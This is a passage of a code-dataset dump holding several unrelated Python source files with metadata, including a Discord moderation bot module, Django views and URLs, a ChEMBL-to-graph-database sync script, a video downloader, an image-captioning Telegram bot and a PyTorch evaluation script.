datetime\nfrom util.decorator import can_manage_message\nfrom util.exception import InvalidArgs\n\nMOD_DELETED = (\"Votre message a été supprimé par {} pour la raison suivante :\"\n + \"\\n{}\\nRappel du message :\\n{}\")\nMOD_MOVE = (\"Votre message a été déplacé de {} à {} par {} pour la raison \"\n + \"suivante :\\n{}\")\n\nasync def move_message(msg, target, reason):\n em = discord.Embed(description=msg.content, timestamp=msg.created_at)\n em.set_footer(text=\"message déplacé\")\n em.set_author(icon_url=msg.author.avatar_url, name=msg.author.name)\n if msg.attachments:\n em.set_image(url=msg.attachments[0].url)\n await target.send(embed=em)\n await msg.delete()\n if reason:\n await msg.author.send(reason)\n\nclass CmdModeration:\n @can_manage_message\n async def cmd_mdelete(self, *args, message, channel, member, **_):\n \"\"\"/mdelete {message_id} [!][*raison]\"\"\"\n if not args:\n raise InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n await msg.delete()\n await message.delete()\n if len(args) >= 2:\n reason = ' '.join(args[1:])\n if reason.startswith('!'):\n await msg.author.send(MOD_DELETED.format(member.mention, reason[1:],\n msg.content))\n\n @can_manage_message\n async def cmd_mmove(self, *args, message, member, channel, client, **_):\n \"\"\"/mmove {message_id} {channel} [!][*raison]\"\"\"\n await message.delete()\n if not args:\n raise InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n target = client.get_channel(int(args[1]))\n reason = None\n if len(args) >= 3:\n reason = ' '.join(args[2:])\n if reason.startswith('!'):\n reason = MOD_MOVE.format(channel.mention, target.mention,\n member.mention, reason[1:])\n await move_message(msg, target, reason)\n\n @can_manage_message\n async def cmd_mmoveafter(self, *args, channel, member, message, client, **_):\n \"\"\"/mmoveafter {message_id} {channel} [!][*raison]\"\"\"\n await message.delete()\n if not args:\n raise InvalidArgs(\"Pas d'argument reçu\")\n msg = await channel.fetch_message(int(args[0]))\n target = client.get_channel(int(args[1]))\n reason = None\n if len(args) >= 3:\n reason = ' '.join(args[2:])\n if reason.startswith('!'):\n reason = MOD_MOVE.format(channel.mention, target.mention,\n member.mention, reason[1:])\n history = await channel.history(after=msg.created_at - datetime.timedelta(milliseconds=1),\n limit=None).flatten()\n notified = set()\n for msg in history:\n await move_message(msg, target,\n reason if msg.author not in notified else None)\n notified.add(msg.author)\n", "sub_path": "Commands/moderation_tools.py", "file_name": "moderation_tools.py", "file_ext": "py", "file_size_in_byte": 3112, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "discord.Embed", "line_number": 12, "usage_type": "call"}, {"api_name": "util.exception.InvalidArgs", "line_number": 27, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 23, "usage_type": "name"}, {"api_name": "util.exception.InvalidArgs", "line_number": 42, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 37, "usage_type": "name"}, {"api_name": "util.exception.InvalidArgs", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 67, "usage_type": "call"}, {"api_name": "util.decorator.can_manage_message", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "40290711", "text": "from django.contrib import admin\nfrom django.urls import path\nfrom .views import (\n VendaCreateView\n , ProdutoCreateView\n , VendaListView\n , VendaCorrecaoUpdateView\n , VendaAtualizarObservacaoView\n , VendaAtualizarClienteView\n , VendaView\n , VendaDetailView\n , VendaPDFDetailView\n)\n\nurlpatterns = [\n path('cadastrar/venda', VendaCreateView.as_view(), name=\"cadastrar_venda\"),\n path('cadastrar/produto', ProdutoCreateView.as_view(), name=\"cadastrar_produto\"),\n path('listar/venda', VendaListView.as_view(), name=\"listar_venda\"),\n path('atualizar/venda/', VendaCorrecaoUpdateView.as_view(), name=\"corrigir_venda\"),\n path('atualizar/venda/observacao/', VendaAtualizarObservacaoView.as_view(), name=\"atualizar_observacao_venda\"),\n path('atualizar/venda/cliente/', VendaAtualizarClienteView.as_view(), name=\"atualizar_cliente_venda\"),\n path('ajax/desabilitar/venda/', VendaView.desabilitarVenda, name=\"ajax_desabilitar_venda\"),\n path('ajax/habilitar/venda/', VendaView.habilitarVenda, name=\"ajax_habilitar_venda\"),\n path('detalhes/venda/', VendaDetailView.as_view(), name=\"detalhes_venda\"),\n path('pdf/venda/', VendaPDFDetailView.as_view(), name=\"pdf_venda\"),\n]\n\n", "sub_path": "vendas/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.VendaCreateView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.VendaCreateView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.ProdutoCreateView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.ProdutoCreateView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.VendaListView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.VendaListView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.VendaCorrecaoUpdateView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.VendaCorrecaoUpdateView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.VendaAtualizarObservacaoView.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.VendaAtualizarObservacaoView", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.VendaAtualizarClienteView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.VendaAtualizarClienteView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.VendaView.desabilitarVenda", "line_number": 22, "usage_type": "attribute"}, {"api_name": "views.VendaView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.VendaView.habilitarVenda", "line_number": 23, "usage_type": "attribute"}, {"api_name": "views.VendaView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.VendaDetailView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "views.VendaDetailView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.VendaPDFDetailView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "views.VendaPDFDetailView", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "430619170", "text": "from django.shortcuts import render\nfrom django.views import View\n\nfrom .forms import ItemAddForm, ItemFormSet\nfrom inventory.models import Item\n\n# Create your views here.\nclass CreatePurchasingView(View):\n def post(self, request):\n item_formset = ItemFormSet(request.POST)\n \n if item_formset.is_valid():\n for form in item_formset:\n data = form.cleaned_data\n print(data)\n return render(request, \"purchasing_add.html\", {'form': ItemFormSet()})\n\n def get(self, request):\n item_formset = ItemFormSet()\n return render(request, \"purchasing_add.html\", {'form': item_formset})\n", "sub_path": "purchasing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 659, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.views.View", "line_number": 8, "usage_type": "name"}, {"api_name": "forms.ItemFormSet", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.ItemFormSet", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.ItemFormSet", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "642608684", "text": "# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport abc\nimport cStringIO\nimport gzip\nimport hashlib\nimport os\nimport tarfile\nimport logging\n\n\nclass Base(object):\n \"\"\"Base is an abstract base class representing a container builder.\n\n It provides methods for generating a dependency layer and an application\n layer.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta # For enforcing that methods are overriden.\n\n def __init__(self, ctx):\n self._ctx = ctx\n\n @abc.abstractmethod\n def CreatePackageBase(self, base_image, cache):\n \"\"\"Create an image exists with the packages on this base.\n Args:\n base_image: docker_name.Tag, the base image on which we install pkgs.\n cache: cache.Base, a cache into which artifacts may be read/written.\n Returns:\n a v2_2.docker_image.DockerImage of the above.\n \"\"\"\n\n @abc.abstractmethod\n def BuildAppLayer(self):\n \"\"\"Synthesizes the application layer from the context.\n Returns:\n a raw string of the layer's .tar.gz\n \"\"\"\n\n def __enter__(self):\n \"\"\"Initialize the builder.\"\"\"\n\n def __exit__(self, unused_type, unused_value, unused_traceback):\n \"\"\"Cleanup after the builder.\"\"\"\n\n\nclass JustApp(Base):\n \"\"\"JustApp is an implementation of a builder that only generates an\n application layer.\n \"\"\"\n\n def __init__(self, ctx):\n super(JustApp, self).__init__(ctx)\n\n def CreatePackageBase(self, base_image, cache):\n \"\"\"Override.\"\"\"\n # JustApp doesn't install anything, it just appends\n # the application layer, so return the base image as\n # our package base.\n return base_image\n\n def BuildAppLayer(self):\n \"\"\"Override.\"\"\"\n buf = cStringIO.StringIO()\n logging.info('Starting to generate tarfile from context...')\n with tarfile.open(fileobj=buf, mode='w') as out:\n for name in self._ctx.ListFiles():\n content = self._ctx.GetFile(name)\n info = tarfile.TarInfo(os.path.join('app', name))\n info.size = len(content)\n out.addfile(info, fileobj=cStringIO.StringIO(content))\n logging.info('Finished generating tarfile from context.')\n\n tar = buf.getvalue()\n sha = 'sha256:' + hashlib.sha256(tar).hexdigest()\n\n gz = cStringIO.StringIO()\n logging.info('Starting to gzip tarfile...')\n with gzip.GzipFile(fileobj=gz, mode='w', compresslevel=1) as f:\n f.write(tar)\n logging.info('Finished gzipping tarfile.')\n return gz.getvalue(), sha\n", "sub_path": "ftl/common/builder.py", "file_name": "builder.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "abc.ABCMeta", "line_number": 31, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 36, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cStringIO.StringIO", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 78, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 79, "usage_type": "call"}, {"api_name": "tarfile.TarInfo", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cStringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 85, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 88, "usage_type": "call"}, {"api_name": "cStringIO.StringIO", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 91, "usage_type": "call"}, {"api_name": "gzip.GzipFile", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "474416167", "text": "#!/usr/bin/python2\nfrom __future__ import print_function\n\nfrom paths import ChEMBL_Database, Stat\n\nSQL_QueryBinds = \"\"\"\n SELECT m.chembl_id,\n d.action_type,\n t.chembl_id\n FROM Drug_mechanism AS d,\n Molecule_dictionary AS m,\n target_dictionary AS t\n WHERE d.molregno = m.molregno\n AND d.tid = t.tid\n AND t.organism = 'Homo sapiens'\n AND t.target_type = 'SINGLE PROTEIN';\n\"\"\"\nCYPHER_FindBinds = \"\"\"\n MATCH (c:Compound) -\n [b:BINDS_CbP] ->\n (p:Protein)\n RETURN c.chembl_id AS compound_id,\n p.chembl_id AS protein_id,\n b.sources AS sources,\n b.chembl_action_type AS action_type\n\"\"\"\nCYPHER_UpdateBinds = \"\"\"\n MATCH (c:Compound { chembl_id: {compound_id} } ),\n (p:Protein { chembl_id: {protein_id} } )\n MERGE (c)-[b:BINDS_CbP]->(p)\n SET b += {\n chembl_action_type: {action_type},\n sources: {sources}\n }\n RETURN COUNT(b) AS count\n\"\"\"\nCYPHER_DeleteBinds = \"\"\"\n MATCH (c:Compound { chembl_id: {compound_id} } ) -\n [b:BINDS_CbP] ->\n (p:Protein { chembl_id: {protein_id} } )\n DELETE b\n RETURN COUNT(b) AS count\n\"\"\"\n\n\ndef main():\n \"\"\"Update BINDS_CbP edges from ChEMBL sqlite3 database.\"\"\"\n from paths import parse_opts, open_spoke\n opts = parse_opts()\n do_update = opts['u']\n\n import sqlite3\n with sqlite3.connect(ChEMBL_Database) as cdb, open_spoke() as sdb:\n session = sdb.session()\n c = cdb.cursor()\n chembl_binds = get_chembl_binds(c)\n spoke_binds = get_spoke_binds(session)\n with session.begin_transaction() as tx:\n update_binds(tx, spoke_binds, chembl_binds)\n tx.success = do_update\n\n\ndef get_chembl_binds(c):\n \"\"\"Return (compound,protein)->action_type map from ChEMBL.\n\n compound and protein are ChEMBL ids.\n \"\"\"\n chembl_binds = {}\n for row in c.execute(SQL_QueryBinds):\n (compound_chembl_id, action_type, protein_chembl_id) = row\n if action_type is None:\n continue\n # XXX: More checking if needed\n chembl_binds[(compound_chembl_id, protein_chembl_id)] = action_type\n print(\"%d binding interactions in ChEMBL\" % len(chembl_binds))\n return chembl_binds\n\n\ndef get_spoke_binds(session):\n spoke_binds = {}\n for r in session.run(CYPHER_FindBinds):\n compound_id = r[\"compound_id\"]\n protein_id = r[\"protein_id\"]\n sources = r[\"sources\"]\n if sources is None:\n sources = []\n action_type = r[\"action_type\"]\n spoke_binds[(compound_id, protein_id)] = (sources, action_type)\n print(\"%d binding interactions in SPOKE\" % len(spoke_binds))\n return spoke_binds\n\n\ndef update_binds(session, spoke_binds, chembl_binds):\n \"\"\"Update BINDS_CbP edges in SPOKE.\n \n spoke_binds is a map: (compound,protein)->(source, action_type)\n chembl_binds is a map: (compound,protein)->action_type\n BINDS_CbP edges fall into three categories:\n new: in ChEMBL but not in SPOKE (add)\n existing: : in both and are the same (ignore) or different (update)\n obsolete: in SPOKE but not in ChEMBL (ignore, delete or update)\n \"\"\"\n SourceName = \"ChEMBL\"\n #\n # Find new/existing/obsolete edges\n #\n chembl_set = set(chembl_binds)\n spoke_set = set(spoke_binds)\n new_edges = chembl_set - spoke_set\n existing_edges = chembl_set & spoke_set\n obsolete_edges = spoke_set - chembl_set\n #\n # Add new edges\n #\n new_stat = Stat()\n for key in new_edges:\n compound_id, protein_id = key\n action_type = chembl_binds[key] # match get_chembl_binds\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=[SourceName],\n action_type=action_type)\n count = new_stat.add_query_result(rows)\n # if count != 1:\n # print(\"new count!=1\", count, compound_id, protein_id)\n #\n # Update existing edges\n #\n unchanged = 0\n update_stat = Stat()\n for key in existing_edges:\n compound_id, protein_id = key\n sources, spoke_action_type = spoke_binds[key] # match get_spoke_binds\n chembl_action_type = chembl_binds[key]\n if SourceName in sources:\n if chembl_action_type == spoke_action_type:\n unchanged += 1\n continue\n else:\n sources.append(SourceName)\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=sources,\n action_type=chembl_action_type)\n count = update_stat.add_query_result(rows)\n # if count != 1:\n # print(\"update count!=1\", count, compound_id, protein_id)\n #\n # Drop obsolete edges\n #\n obsolete_stat = Stat()\n for key in obsolete_edges:\n compound_id, protein_id = key\n sources, action_type = spoke_binds[key]\n if SourceName not in sources:\n continue\n if len(sources) == 1:\n rows = session.run(CYPHER_DeleteBinds,\n compound_id=compound_id,\n protein_id=protein_id)\n action = \"delete\"\n else:\n sources.remove(SourceName)\n rows = session.run(CYPHER_UpdateBinds,\n compound_id=compound_id,\n protein_id=protein_id,\n sources=sources,\n action_type=None)\n action = \"update\"\n count = obsolete_stat.add_query_result(rows)\n # if count != 1:\n # print(\"obsolete count!=1\", action, count, compound_id, protein_id)\n #\n # Report statistics\n #\n print(len(spoke_binds), \"edges in SPOKE before update\")\n print(len(chembl_binds), \"edges from ChEMBL\")\n print(\" \", len(existing_edges), \"edges already in SPOKE\")\n print(\" \", len(new_edges), \"edges not in SPOKE\")\n print(len(obsolete_edges), \"SPOKE edges not in ChEMBL\")\n print(\"adding %d new edges (%d failures, %d anomalies)\" %\n (new_stat.attempts, new_stat.failures, new_stat.anomalies))\n print(\"%d edges unchanged\" % unchanged)\n print(\"updating %d edges (%d failures, %d anomalies)\" %\n (update_stat.attempts, update_stat.failures, update_stat.anomalies))\n print(\"obsoleting %d edges (%d failures, %d anomalies)\" %\n (obsolete_stat.attempts, obsolete_stat.failures,\n obsolete_stat.anomalies))\n\n\nif __name__ == \"__main__\":\n profile = False\n if not profile:\n main()\n else:\n import cProfile, pstats\n pr = cProfile.Profile()\n pr.runcall(main)\n stats = pstats.Stats(pr)\n stats.strip_dirs().sort_stats(\"cumulative\").print_stats(20)\n", "sub_path": "update/update_CbP_chembl.py", "file_name": "update_CbP_chembl.py", "file_ext": "py", "file_size_in_byte": 6993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "paths.parse_opts", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 53, "usage_type": "call"}, {"api_name": "paths.ChEMBL_Database", "line_number": 53, "usage_type": "argument"}, {"api_name": "paths.open_spoke", "line_number": 53, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 115, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 131, "usage_type": "call"}, {"api_name": "paths.Stat", "line_number": 153, "usage_type": "call"}, {"api_name": "cProfile.Profile", "line_number": 199, "usage_type": "call"}, {"api_name": "pstats.Stats", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "59737712", "text": "import re\nimport os\nimport logging\nfrom pccold.config import conf\nimport requests\n\nroom_obj_list = []\n\nfrom .tools import read, saveStream, ReturnCodeObserverThread, SleepKillerThread\nfrom .bypyrm import doBypy\n\nisinit = False\n\n\ndef getRoomObjList():\n global room_obj_list\n global isinit\n global conf\n files = os.listdir(conf.download_path)\n if isinit:\n return room_obj_list\n logging.info('init room obj list')\n md = read(conf.videolist_path)\n lines = md.split('\\n')\n for l in lines:\n match = re.match(r'\\[(.*)\\]\\((.*)\\)', l)\n if l and match:\n room_obj = {'file_name': match.group(\n 1)+'.mp4', 'url': match.group(2)}\n if room_obj.get('file_name', '') in files:\n logging.info(room_obj.get('file_name', '')+' is exist')\n else:\n room_obj_list.append(room_obj)\n isinit = True\n return room_obj_list\n\n\ndef downloadVideo():\n global conf\n print('videodownload main')\n room_obj_list = getRoomObjList()\n if len(room_obj_list) > 0:\n room_obj = room_obj_list.pop()\n saveStream('source', room_obj.get(\n 'file_name', 'default.mp4'), url=room_obj.get('url', ''))\n elif conf.is_bypy:\n doBypy()\n\n\ndef reqVideoList(author):\n result = []\n api = 'https://v.douyu.com/show/'\n url = \"https://v.douyu.com/video/author/getAuthorShowAndVideoList?up_id={author}\".format(\n author=author)\n data = requests.get(url).json()\n ls = data.get('data').get('list')\n for l in ls:\n vls = l.get('video_list')\n for ll in vls:\n title = ll.get('title')\n file_name = re.sub(r\"[\\/\\\\\\:\\*\\?\\\"\\<\\>\\| \\$\\^\\+\\-\\!]\", '_', title)\n result.append({'url': api+ll.get('hash_id'),\n 'file_name': file_name+'.mp4'})\n return result\n\n\ndef download3DaysVideo():\n global conf\n room_obj_list = reqVideoList(conf.video_author)\n if len(room_obj_list) > 0:\n room_obj = room_obj_list.pop()\n saveStream('source', room_obj.get(\n 'file_name', 'default.mp4'), url=room_obj.get('url', ''))\n elif conf.is_bypy:\n doBypy()\n\n\nif __name__ == '__main__':\n downloadVideo()\n", "sub_path": "pccold/videodownload.py", "file_name": "videodownload.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pccold.config.conf.download_path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "tools.read", "line_number": 23, "usage_type": "call"}, {"api_name": "pccold.config.conf.videolist_path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 23, "usage_type": "name"}, {"api_name": "re.match", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "tools.saveStream", "line_number": 44, "usage_type": "call"}, {"api_name": "pccold.config.conf.is_bypy", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 46, "usage_type": "name"}, {"api_name": "bypyrm.doBypy", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 55, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 61, "usage_type": "call"}, {"api_name": "pccold.config.conf.video_author", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 69, "usage_type": "name"}, {"api_name": "tools.saveStream", "line_number": 72, "usage_type": "call"}, {"api_name": "pccold.config.conf.is_bypy", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pccold.config.conf", "line_number": 74, "usage_type": "name"}, {"api_name": "bypyrm.doBypy", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "389431541", "text": "# coding: utf-8\nfrom PIL import Image as Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nfrom bs4 import BeautifulSoup\nfrom random import randint\nimport requests, urllib.request, textwrap, os, dryscrape, time, dryscrape, \\\ntelepot, random, sys, MySQLdb\n\nimgdir = sys.argv[1] + '/images'\n\n# --- Set API keys ---\ntgkey = \"SELECT * FROM auth WHERE keyname = '%s'\"\n\ndef get_auth(name):\n db=MySQLdb.connect(read_default_group='files')\n cursor = db.cursor()\n botname = name\n cursor.execute(tgkey % (botname))\n results = cursor.fetchall()\n for row in results:\n token = row[1]\n keys = token.split('\\n')\n return keys\n\nkeys=get_auth('insbot')\n\ni_key = keys[1]\ni_secret = keys[2]\n\n# --- Set telegram bot instance ---\nbot = telepot.Bot(keys[0])\nresponse = bot.getUpdates()\n\n# --- Open tags file ---\ntags = sys.argv[2] + '/tags.txt'\nwith open(tags,'r') as f:\n tags = eval(f.read())\n\ndef gen_img():\n count = 0\n while count == 0:\n try:\n path = '{0}/{1}'.format(imgdir,random. \\\n choice(os.listdir(\"{0}/\".format(imgdir))))\n count +=1\n except:\n pass\n return path\n\ndef upload_img(image):\n path = image\n response = requests.post('https://api.imagga.com/v1/content',\n auth=(i_key, i_secret),\n files={'image': open(path, 'r+b')})\n fileid = response.json()['uploaded'][0]['id']\n uploaded = fileid, path\n return uploaded\n\ndef get_tag(uploaded):\n image = uploaded\n image_id = image[0]\n image_path = image[1]\n response = requests.get('https://api.imagga.com/v1/tagging?content={0}' \\\n .format(image_id), auth=(i_key, i_secret))\n tag = response.json()['results'][0]['tags'][0]['tag']\n certainty = response.json()['results'][0]['tags'][0]['confidence']\n for key, value in tags.items():\n if tag in key:\n tag = value\n certainty = randint(68,99)\n metadata = image_path, tag, certainty\n return metadata\n\ndef get_quote(metadata):\n metadata = metadata\n image_path = metadata[0]\n tag = metadata[1]\n url = 'http://railgang.com/markov.php?tags={0}'.format(tag)\n user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) \\\n Gecko/2009021910 Firefox/3.0.7'\n headers={'User-Agent':user_agent,}\n count = 0\n while count == 0:\n try:\n request=urllib.request.Request(url,None,headers)\n quote = urllib.request.urlopen(request).read()\n quote = quote.decode('ascii')\n count += 1\n except:\n pass\n image_with_quote = image_path, quote, tag\n return image_with_quote\n\ndef draw_img(path_and_quote):\n data = path_and_quote\n filepath = data[0]\n quote = data[1]\n img = Image.open(filepath)\n draw = ImageDraw.Draw(img)\n width, height = img.size\n if width <= 360:\n img = '{0}/{1}'.format(imgdir,random.\\\n choice(os.listdir(\"{0}/\".format(imgdir))))\n elif width <= 650:\n fsize = 25\n margin = offset = randint(0,50)\n linewidth = 30\n else:\n fsize = 30\n margin = offset = randint(0,120)\n linewidth = 40\n font = ImageFont.truetype('{0}/Adventure.otf'.format(sys.argv[1]), fsize)\n return filepath, img, quote, font, fsize, margin, offset, linewidth, draw\n\ndef theimg(image):\n imgf, img, quote, font, fsize, margin, offset, linewidth, draw = image\n shadowcolor = \"black\"\n for line in textwrap.wrap(quote, width=linewidth):\n draw.text((margin-2, offset-2), line, font=font, fill=shadowcolor)\n draw.text((margin+2, offset-2), line, font=font, fill=shadowcolor)\n draw.text((margin-2, offset+2), line, font=font, fill=shadowcolor)\n draw.text((margin+2, offset+2), line, font=font, fill=shadowcolor)\n draw.text((margin, offset), line, font=font, fill=\"#ffffff\")\n offset += font.getsize(line)[1]\n\n output = '{0}/outimg.jpg'.format(sys.argv[1])\n img.save(output)\n return output\n", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 3975, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "MySQLdb.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "telepot.Bot", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 36, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 64, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 71, "usage_type": "call"}, {"api_name": "urllib.request.request.Request", "line_number": 86, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 86, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 86, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 87, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 87, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 87, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 100, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 111, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "textwrap.wrap", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 127, "usage_type": "attribute"}]} +{"seq_id": "384902398", "text": "#-*-coding:utf-8-*-\r\n'''\r\nCreated on Nov 7,2018\r\n\r\n@author: pengzhiliang\r\n'''\r\nfrom __future__ import print_function\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom model import Net\r\nfrom dataset import xywh_to_x1y1x2y2, x1y1x2y2_to_xywh\r\nfrom torchvision import transforms\r\nfrom display import dis_gt\r\n\r\nresume_path = '/home/pzl/object-localization/checkpoint/best_model.pkl'\r\nprint('Loading model...')\r\nnet = Net('mobilenet',freeze_basenet = False)\r\nnet.load_state_dict(torch.load(resume_path)[\"model_state\"])\r\nnet.eval()\r\n\r\nprint('load image...')\r\nimg_path = './images/test_img.JPEG'\r\ntarget_classes = ['car', 'bird', 'turtle', 'dog', 'lizard']\r\nbbox = np.array([11,37,90,105],dtype = np.float32) \r\nlabel = np.array([3],dtype = np.int32) \r\n\r\nimg = Image.open(img_path).convert('RGB')\r\nIMG = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.485,0.456,0.406),(0.229,0.224,0.225))\r\n])(img)\r\n# gt_class,gt_bbox =torch.Tensor(label),torch.Tensor(bbox/128.)\r\n\r\nwith torch.no_grad():\r\n outputs_reg,outputs_class = net(IMG.unsqueeze(0))\r\n # print(outputs_reg,outputs_class)\r\n _,pred_label = outputs_class.squeeze(0).max(dim = 0)\r\n pred_bbox = xywh_to_x1y1x2y2(outputs_reg).squeeze(0)\r\n print(pred_label,pred_bbox)\r\n\r\ndis_gt(img,[target_classes[int(pred_label.item())],target_classes[label]],[pred_bbox.numpy()*128,bbox])\r\n", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 1379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 